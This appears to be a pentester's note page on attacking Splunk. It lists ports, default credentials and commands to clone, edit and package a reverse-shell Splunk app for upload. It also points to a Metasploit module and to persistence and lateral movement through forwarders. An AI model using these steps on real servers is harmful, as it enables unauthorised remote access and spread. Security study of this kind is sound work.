Splunk is a web interface for searching, monitoring, and analyzing machine-generated data in real-time. It's often used as a SIEM.

It's a paid software. There is a 60-days free trial for companies.

Ports 🐲: 8000 (TCP/HTTPS), 8089 (TCP/Splunkd)

The splunkbase website is the official website to browse for add-ons to extend Splunk usually for a specific usage.

Splunk Pentester Notes ☠️

attacking_common_applications splunkd splunk_lpe_and_persistence


  • Navigate to Help > About > Version to find the version (logged)


  • There is no authentication in the free version. If a trial version that has expired is still installed, if becomes a free version.

  • Default credentials are admin:changeme in older versions. For newer versions, the password is set at install.


There are multiple ways of running code. We can use scripted input such as with reverse_shell_splunk (0.03k ⭐, 2018 πŸͺ¦).

To target a Windows host, we need to configure the run.ps1 script.

$ git clone https://github.com/0xjpuff/reverse_shell_splunk
$ cd reverse_shell_splunk/
$ nano reverse_shell_splunk/bin/run.ps1
$ tar -cvzf updater.tar.gz reverse_shell_splunk

Navigate to Apps > Edit, and click on "install app from file."

➑️ See also: use exploit/multi/http/splunk_upload_app_exec.

➑️ For persistence, we may configure the schedule of the scripted input. If the server is a deployment server, and if target hosts have an Universal Forwarders we may be able to compromise them.

πŸ‘» To-do πŸ‘»

Stuff that I found, but never read/used yet.

  • Splunkd, Splunk management, communication with Splunk REST API